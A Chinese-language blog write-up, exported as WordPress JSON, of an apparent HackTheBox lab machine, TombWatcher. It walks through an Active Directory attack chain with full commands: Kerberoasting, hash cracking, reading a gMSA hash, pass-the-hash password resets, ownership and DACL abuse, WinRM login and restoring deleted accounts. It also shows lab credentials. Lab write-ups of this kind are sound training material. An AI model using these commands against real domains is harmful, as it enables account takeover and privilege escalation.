{"id":304,"date":"2025-06-11T10:45:54","date_gmt":"2025-06-11T02:45:54","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=304"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"304","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/06\/11\/304\/","title":{"rendered":"HTB\u9776\u673a TombWatcher \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<code>10.129.97.234<\/code>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p>\n<p><strong>\u9898\u76ee\u51ed\u636e\uff1a<code>henry \/ H3nry_987TGV!<\/code><\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.97.234 (10.129.97.234) 56(84) bytes of data.\n64 bytes from 10.129.97.234: icmp_seq=1 ttl=127 time=385 ms\n64 bytes from 10.129.97.234: icmp_seq=2 ttl=127 time=288 ms\n64 bytes from 10.129.97.234: icmp_seq=3 ttl=127 time=332 ms\n64 bytes from 10.129.97.234: icmp_seq=4 ttl=127 time=290 ms\n\n--- 10.129.97.234 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3003ms\nrtt min\/avg\/max\/mdev = 288.118\/323.742\/384.674\/39.398 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:27:19 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.37s latency).\nAll 65535 scanned ports on 10.129.97.234 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Mon Jun  9 13:28:05 2025 -- 1 IP address (1 host up) scanned in 46.65 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u5224\u65ad\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:30:15 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.29s latency).\nNot shown: 65516 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n80\/tcp    open  http          Microsoft IIS httpd 10.0\n|_http-title: IIS Windows Server\n| http-methods: \n|_  Potentially risky methods: TRACE\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-09 09:31:13Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n|_ssl-date: 2025-06-09T09:32:55+00:00; +4h00m00s from scanner time.\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n|_ssl-date: 2025-06-09T09:32:54+00:00; +3h59m58s from scanner time.\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-09T09:32:55+00:00; +4h00m00s from scanner time.\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n3269\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-09T09:32:54+00:00; +3h59m58s from scanner time.\n| ssl-cert: Subject: commonName=DC01.tombwatcher.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb\n| Not valid before: 2024-11-16T00:47:59\n|_Not valid after:  2025-11-16T00:47:59\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49677\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49678\/tcp open  msrpc         Microsoft Windows RPC\n49679\/tcp open  msrpc         Microsoft Windows RPC\n49698\/tcp open  msrpc         Microsoft Windows RPC\n49705\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2019|10 (97%)\nOS CPE: cpe:\/o:microsoft:windows_server_2019 cpe:\/o:microsoft:windows_10\nAggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2025-06-09T09:32:16\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   281.62 ms 10.10.14.1\n2   282.92 ms 10.129.97.234\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Mon Jun  9 13:32:58 2025 -- 1 IP address (1 host up) scanned in 163.76 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Jun  9 13:34:01 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.97.234\nNmap scan report for 10.129.97.234\nHost is up (0.29s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Mon Jun  9 13:34:46 2025 -- 1 IP address (1 host up) scanned in 45.19 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows Server 2019<\/code>\uff0c\u4e14\u4e3a\u57df\u63a7\u5236\u5668\uff0c\u4e3b\u57df\u540d\u4e3a<code>tombwatcher.htb<\/code>\uff0c\u4e3b\u673a\u540d\u4e3a<code>dc01<\/code>\uff0c\u8fd8\u90e8\u7f72\u4e86<code>IIS 10.0 Web<\/code>\u670d\u52a1\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>DNS\u670d\u52a1\uff0853\u7aef\u53e3\uff09<\/h2>\n<p>\u9996\u5148\u5c1d\u8bd5\u4f7f\u7528<code>dig<\/code>\u5de5\u5177\u67e5\u8be2\u9776\u673a<code>DNS<\/code>\u670d\u52a1\u57fa\u672c\u8bb0\u5f55\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">dig any tombwatcher.htb @dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749447717655-bdf5f8dd-87b5-4344-86f3-fbfb5edfeed5.png\" alt=\"\" \/><\/p>\n<p>\u9664\u57df\u63a7\u4e3b\u673a\u540d\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u5b50\u57df\u540d\u3002<\/p>\n<h2>Kerberos\u670d\u52a1\uff0888\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u901a\u8fc7\u9898\u76ee\u63d0\u4f9b\u7684\u51ed\u636e\uff0c\u4f7f\u7528<code>impacket-lookupsid<\/code>\u5de5\u5177\u7206\u7834\u57df\u5185\u7528\u6237\u7684<code>RID<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.tombwatcher.htb\nimpacket-lookupsid -domain-sids tombwatcher.htb\/henry:'H3nry_987TGV!'@dc01.tombwatcher.htb 40000<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749450552650-fa0fa0ea-8be5-490e-8870-139877268189.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u8fc7<code>SID<\/code>\u679a\u4e3e\uff0c\u53d1\u73b0\u5982\u4e0b\u7528\u6237\uff0c\u5199\u5165<code>aduser.lst<\/code>\u6587\u4ef6\u4e2d\uff1a<\/p>\n<pre><code class=\"language-plain\">Administrator\nGuest\nkrbtgt\nDC01$\nHenry\nAlfred\nsam\njohn\nansible_dev<\/code><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u901a\u8fc7<code>Kerberoasting<\/code>\u653b\u51fb\u624b\u6cd5\u83b7\u53d6\u4e86<code>ansible_dev<\/code>\u7528\u6237\u7684<code>TGS-REP<\/code>\u54c8\u5e0c\uff0c\u4f46\u65e0\u6cd5\u7834\u89e3\u3002<\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/dc01.tombwatcher.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749454900535-09b7f728-4f4f-4689-a065-b998db44994a.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e3a<code>IIS<\/code>\u670d\u52a1\u5668\u9ed8\u8ba4\u9875\u9762\uff0c\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff0c\u4f46\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h2>\u57df\u5916\u679a\u4e3e\u57df\u5185\u5173\u7cfb<\/h2>\n<p>\u9274\u4e8e\u9898\u76ee\u5df2\u7ecf\u63d0\u4f9b\u4e86\u4e00\u4e2a\u767b\u5f55\u51ed\u636e\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528<code>bloodhound-python<\/code>\u5de5\u5177\uff0c\u8fde\u63a5<code>LDAP<\/code>\u6570\u636e\u5e93\u8fdb\u884c\u57df\u5185\u5173\u7cfb\u679a\u4e3e\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodhound-python -c All -d tombwatcher.htb -u Henry -p 'H3nry_987TGV!' -dc dc01.tombwatcher.htb -ns 10.129.97.234 --zip<\/code><\/pre>\n<p>\u968f\u540e\u5c06\u6253\u5305\u597d\u7684\u6570\u636e\u96c6\u4e0a\u4f20\u81f3<code>BloodHound<\/code>\uff0c\u9996\u5148\u70b9\u51fb<code>Analysis =&gt; Find Shortest Paths to Domain Admins<\/code>\uff0c\u5217\u51fa\u57df\u5185\u6700\u77ed\u653b\u51fb\u8def\u5f84\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749460955135-cbb81c65-9931-4f3a-8783-bedf9826f173.png\" alt=\"\" \/><\/p>\n<p>\u6839\u636e\u653b\u51fb\u8def\u5f84\u56fe\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\u5982\u4e0b\u60c5\u51b5\uff1a<\/p>\n<ul>\n<li>\u5f53\u524d\u7528\u6237<code>Henry<\/code>\u5bf9<code>Alfred<\/code>\u7528\u6237\u5b58\u5728<code>WriteSPN<\/code>\u6743\u9650\uff1b<\/li>\n<li><code>Alfred<\/code>\u7528\u6237\u5bf9\u7528\u6237\u7ec4<code>Infrastructure<\/code>\u5b58\u5728<code>AddSelf<\/code>\u6743\u9650\uff1b<\/li>\n<li>\u7528\u6237\u7ec4<code>Infrastructure<\/code>\u5bf9\u7ec4\u6258\u7ba1\u670d\u52a1\u8d26\u6237<code>ansible_dev$<\/code>\u5b58\u5728<code>ReadGMSAPassword<\/code>\u6743\u9650\uff1b<\/li>\n<li>\u7ec4\u6258\u7ba1\u670d\u52a1\u8d26\u6237\u5bf9\u7528\u6237<code>sam<\/code>\u5b58\u5728<code>ForceChangePassword<\/code>\u6743\u9650\uff1b<\/li>\n<li><code>sam<\/code>\u7528\u6237\u5bf9<code>john<\/code>\u7528\u6237\u5b58\u5728<code>WriteOwner<\/code>\u6743\u9650<\/li>\n<li><code>john<\/code>\u7528\u6237\u53ef\u767b\u5f55<code>WinRM<\/code>\u8fdc\u7a0b\u7ba1\u7406\u670d\u52a1\u3002<\/li>\n<\/ul>\n<p>\u6839\u636e\u4ee5\u4e0a\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u603b\u7ed3\u51fa\u4e00\u6761\u57df\u6e17\u900f\u8def\u5f84\uff1a<\/p>\n<ol>\n<li>\u9996\u5148\u57fa\u4e8e<code>Henry<\/code>\u7528\u6237\uff0c\u4f7f\u7528<code>targetedKerberoast<\/code>\u5de5\u5177\u5bf9<code>Alfred<\/code>\u7528\u6237\u8fdb\u884c<code>SPN<\/code>\u52ab\u6301\u653b\u51fb\uff0c\u8bfb\u53d6\u5176<code>TGS-REP<\/code>\u54c8\u5e0c\u5c1d\u8bd5\u7834\u89e3\uff1b<\/li>\n<li>\u82e5\u7834\u89e3\u5b8c\u6bd5\uff0c\u5219\u5c06<code>Alfred<\/code>\u7528\u6237\u6dfb\u52a0\u81f3<code>Infrastructure<\/code>\u7ec4\u5185\uff0c\u968f\u540e\u5229\u7528\u5bf9\u7ec4\u6258\u7ba1\u670d\u52a1\u8d26\u6237\u7684\u5371\u9669\u6743\u9650\u8bfb\u53d6\u5176<code>GMSA<\/code>\u5bc6\u7801\uff1b<\/li>\n<li>\u63a7\u5236\u7ec4\u6258\u7ba1\u670d\u52a1\u8d26\u6237\u540e\uff0c\u4f7f\u7528<code>net<\/code>\u5de5\u5177\u8fdc\u7a0b\u66f4\u6539<code>sam<\/code>\u7528\u6237\u5bc6\u7801\uff1b<\/li>\n<li>\u63a7\u5236<code>sam<\/code>\u7528\u6237\u540e\uff0c\u5229\u7528<code>WriteOwner<\/code>\u6743\u9650\u4fee\u6539<code>john<\/code>\u7528\u6237\u5bf9\u8c61\u7684\u6240\u6709\u8005\uff0c\u6dfb\u52a0<code>GenericAll<\/code>\u6743\u9650\u5e76\u4fee\u6539\u5176\u5bc6\u7801\uff0c\u767b\u5f55<code>WinRM<\/code>\u3002<\/li>\n<\/ol>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u57df\u5185\u5371\u9669\u5173\u7cfb\u5229\u7528<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u4f7f\u7528<code>BloodHound<\/code>\u786e\u5b9a\u4e86\u57df\u5185\u6e17\u900f\u8def\u5f84\uff0c\u73b0\u5728\u8fdb\u884c\u6267\u884c\u3002<\/p>\n<p>\u9996\u5148\u4e0b\u8f7d<code>targetedKerberoast<\/code>\u5de5\u5177\uff1a<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/ShutdownRepo\/targetedKerberoast.git<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5b8c\u6bd5\u540e\uff0c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\uff0c\u5bf9<code>Alfred<\/code>\u7528\u6237\u53d1\u8d77<code>SPN<\/code>\u52ab\u6301\u653b\u51fb\uff1a<\/p>\n<pre><code class=\"language-shell\">\/home\/megumin\/Documents\/Programs\/targetedKerberoast\/targetedKerberoast.py -v --dc-ip 10.129.97.234 -d tombwatcher.htb -u Henry -p 'H3nry_987TGV!'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749462453790-bb9a3bba-278b-4631-aa8f-2b56945d43c6.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6<code>Alfred<\/code>\u7684<code>TGS-REP<\/code>\u54c8\u5e0c\uff01\u5c1d\u8bd5\u4f7f\u7528<code>hashcat<\/code>\u5de5\u5177\u914d\u5408\u5b57\u5178<code>rockyou.txt<\/code>\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 13100 -a 0 Z:\\tombwatcher\\Alfred-user-tgsrep.txt .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749462529668-2c4faf5e-80c6-4de3-ac3a-da76df05c1ed.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>tombwatcher.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>Alfred<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>basketball<\/code><\/li>\n<\/ul>\n<p>\u6210\u529f\u63a7\u5236<code>Alfred<\/code>\u7528\u6237\u540e\uff0c\u5229\u7528\u5176\u5bf9\u7528\u6237\u7ec4\u7684<code>AddSelf<\/code>\u6743\u9650\uff0c\u5c06<code>Alfred<\/code>\u81ea\u8eab\u52a0\u5165<code>Infrastructure<\/code>\u7528\u6237\u7ec4\u5185\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u Alfred -p \"basketball\" add groupMember Infrastructure Alfred<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749463478507-1c77073d-b56b-4fef-b7fd-83371035e39a.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01\u63a5\u4e0b\u6765\uff0c\u5229\u7528<code>Infrastructure<\/code>\u7528\u6237\u7ec4\u7684<code>ReadGMSAPassword<\/code>\u6743\u9650\uff0c\u8bfb\u53d6\u7ec4\u6258\u7ba1\u670d\u52a1\u8d26\u6237<code>ansible_dev$<\/code>\u7684<code>NTLM<\/code>\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-shell\">netexec ldap dc01.tombwatcher.htb -u Alfred -p \"basketball\" --gmsa<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749463840164-577cb4fd-db1e-4e8c-ac67-61a1288edd08.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6<code>GMSA<\/code>\u4e34\u65f6\u6027\u8d26\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>tombwatcher.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>ansible_dev$<\/code><\/li>\n<li><code>NTLM<\/code>\u54c8\u5e0c\uff1a<code>1c37d00093dc2a5f25176bf2d474afdc<\/code><\/li>\n<\/ul>\n<p>\u63a7\u5236\u7ec4\u6258\u7ba1\u8d26\u6237\u540e\uff0c\u5229\u7528\u5176\u5bf9<code>sam<\/code>\u7528\u6237\u5bf9\u8c61\u7684<code>ForceChangePassword<\/code>\u6743\u9650\uff0c\u4f7f\u7528<code>pth-net<\/code>\u5de5\u5177\u66f4\u6539<code>sam<\/code>\u7528\u6237\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">pth-net rpc password \"sam\" \"Asd310056\" -U tombwatcher.htb\/\"ansible_dev$\"%\"ffffffffffffffffffffffffffffffff\"%\"1c37d00093dc2a5f25176bf2d474afdc\" -S dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749464428510-14157a74-6963-4104-96eb-5dcdcbb9e178.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<p>\u63a5\u7740\uff0c\u5229\u7528<code>sam<\/code>\u7528\u6237\u5bf9<code>john<\/code>\u7528\u6237\u5bf9\u8c61\u7684<code>WriteOwner<\/code>\u6743\u9650\uff0c\u4fee\u6539<code>john<\/code>\u7528\u6237\u5bf9\u8c61\u7684\u6240\u6709\u8005\u4e3a<code>sam<\/code>\uff0c\u6dfb\u52a0<code>GenericAll<\/code>\u6743\u9650\u540e\uff0c\u5f3a\u5236\u66f4\u6539<code>john<\/code>\u7528\u6237\u7684\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u sam -p \"Asd310056\" set owner john sam\nimpacket-dacledit -action \"write\" -rights \"FullControl\" -principal \"sam\" -target \"john\" tombwatcher.htb\/sam:\"Asd310056\"\nnet rpc password \"john\" \"Asd310056\" -U tombwatcher.htb\/sam%\"Asd310056\" -S dc01.tombwatcher.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749465558069-96113034-e4e8-422d-a5c9-edda98adb877.png\" alt=\"\" \/><\/p>\n<p>\u66f4\u6539<code>john<\/code>\u5bc6\u7801\u6210\u529f\uff01\u76f4\u63a5\u4f7f\u7528<code>evil-winrm<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.tombwatcher.htb -u john -p \"Asd310056\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749465682517-adc39f03-0fb0-4e17-a21b-bdd8c121883b.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u83b7\u5f97\u7528\u6237\u7ea7\u64cd\u4f5c\u6743\u9650\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u57df\u5173\u7cfb\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u6210\u529f\u767b\u5f55<code>john<\/code>\u7528\u6237\u540e\uff0c\u7ee7\u7eed\u5728<code>BloodHound<\/code>\u4e2d\u70b9\u51fb<code>JOHN@TOMBWATCHER.HTB =&gt; First Degree Object Control<\/code>\u67e5\u770b\u5176\u53ef\u76f4\u63a5\u63a7\u5236\u5bf9\u8c61\uff0c\u53d1\u73b0<code>john<\/code>\u7528\u6237\u5bf9\u8c61\u5bf9\u7ec4\u7ec7\u5355\u5143<code>ADCS<\/code>\u5177\u6709<code>GenericAll<\/code>\u6743\u9650\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749604490887-10b97802-7c69-4dde-96a5-b9a0c47115b8.png\" alt=\"\" \/><\/p>\n<p>\u4f46\u67e5\u770b<code>ADCS<\/code>\u7ec4\u7ec7\u5355\u5143\u65f6\uff0c\u53d1\u73b0\u8be5\u7ec4\u7ec7\u5355\u5143\u5185\u6ca1\u6709\u4efb\u4f55\u7528\u6237\u3002<\/p>\n<p>\u518d\u6b21\u67e5\u770b\u9776\u673a\u540d\u79f0<code>TombWatcher<\/code>\uff0c\u6839\u636e\u82f1\u6587\u5355\u8bcd<code>Tomb<\/code>\u7684\u4e2d\u6587\u610f\u601d\u4e3a<strong>\u575f\u5893<\/strong>\u8fd9\u4e00\u4e8b\u5b9e\uff0c\u8054\u60f3\u5230\u539f\u672c<code>ADCS<\/code>\u7ec4\u7ec7\u5355\u5143\u4e0b\u53ef\u80fd\u5b58\u5728\u7528\u6237\uff0c\u4f46\u662f\u540e\u7eed\u88ab\u7f51\u7edc\u7ba1\u7406\u5458<code>john<\/code>\u5220\u9664\u4e86\uff0c<strong>\u9700\u8981\u53bb\u57df\u56de\u6536\u7ad9\u67e5\u627e\u88ab\u5220\u9664\u7684\u5bf9\u8c61<\/strong>\u3002<\/p>\n<blockquote><p><code>Active Directory Recycle Bin<\/code>\u662f\u4e00\u79cd\u5728<code>Windows Server 2012<\/code>\u53ca\u5176\u540e\u7eed\u7248\u672c\u4e2d\u53ef\u542f\u7528\u7684\u529f\u80fd\u3002\u8be5\u529f\u80fd\u4e3a<code>Active Directory<\/code>\u63d0\u4f9b\u4e86\u5783\u573e\u56de\u6536\u7ad9\u673a\u5236\uff0c\u5373\u5f53\u4e00\u4e2a\u57df\u5bf9\u8c61\u88ab\u5220\u9664\u65f6\uff0c<code>Active Directory<\/code>\u4f1a\u79fb\u9664\u8be5\u5bf9\u8c61\u4e0a\u975e\u5fc5\u8981\u7684\u5c5e\u6027\uff0c\u5e76\u4fdd\u5b58\u81f3<code>CN=Deleted Objects,DC=example,DC=com<\/code>\u5bb9\u5668\u5185\uff0c\u5df2\u5220\u9664\u57df\u5bf9\u8c61\u7684\u4fdd\u7559\u65f6\u95f4\u6839\u636e<code>msDS-deletedObjectLifetime<\/code>\u5c5e\u6027\u51b3\u5b9a\uff0c\u800c\u8be5\u5c5e\u6027\u7684\u5185\u5bb9\u53c8\u7531\u57df\u6797\u5bf9\u8c61<code>tombstoneLifetime<\/code>\u5c5e\u6027\u51b3\u5b9a\uff0c\u9ed8\u8ba4\u4e3a<code>180<\/code>\u5929\u3002<\/p><\/blockquote>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>Get-ADObject<\/code>\u547d\u4ee4\u914d\u5408<code>-IncludeDeletedObjects<\/code>\u53c2\u6570\uff0c\u5217\u51fa\u5df2\u5220\u9664\u7684\u57df\u5bf9\u8c61\uff1a<\/p>\n<pre><code class=\"language-powershell\">Get-ADObject -Filter {Deleted -eq $true} -IncludeDeletedObjects<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749606302106-2d7162ec-0afe-482e-840d-3e380cac675e.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u57df\u56de\u6536\u7ad9\u5185\u5b58\u5728\u4e09\u4e2a<code>cert_admin<\/code>\u5bf9\u8c61\u3002\u51b3\u5b9a\u4f7f\u7528<code>Restore-ADObject<\/code>\u547d\u4ee4\uff0c\u9010\u4e00\u5c06\u4e09\u4e2a\u5df2\u5220\u9664\u7528\u6237\u5bf9\u8c61\u8fd8\u539f\u81f3<code>ADCS<\/code>\u7ec4\u7ec7\u5355\u5143\u4e2d\uff0c\u968f\u540e\u5229\u7528<code>GenericAll<\/code>\u6743\u9650\u83b7\u5f97\u5bf9\u8fd8\u539f\u540e\u7528\u6237\u5bf9\u8c61\u7684\u5b8c\u5168\u63a7\u5236\u6743\u9650\uff0c\u63a5\u7740\u91cd\u8bbe\u5176\u5bc6\u7801\uff0c\u5e76\u4f7f\u7528<code>certipy-ad<\/code>\u5de5\u5177\u67e5\u627e\u5176\u8bc1\u4e66\u914d\u7f6e\u6f0f\u6d1e\u3002<\/p>\n<p>\u5728\u5bf9\u6700\u540e\u4e00\u4e2a<code>cert_admin<\/code>\u56de\u6536\u7ad9\u7528\u6237\u5bf9\u8c61\u8fdb\u884c\u4ee5\u4e0a\u64cd\u4f5c\u65f6\uff0c\u53d1\u73b0\u4e86\u6f0f\u6d1e\u3002\u9996\u5148\u5bf9\u5176\u8fdb\u884c\u8fd8\u539f\u548c\u5bc6\u7801\u91cd\u7f6e\uff1a<\/p>\n<pre><code class=\"language-powershell\">Restore-ADObject -Identity \"CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb\" -TargetPath \"OU=ADCS,DC=TOMBWATCHER,DC=HTB\"\nnet user cert_admin \/active:yes \/domain\nnet user cert_admin Asd310056 \/domain<\/code><\/pre>\n<p><img decoding=\"async\" 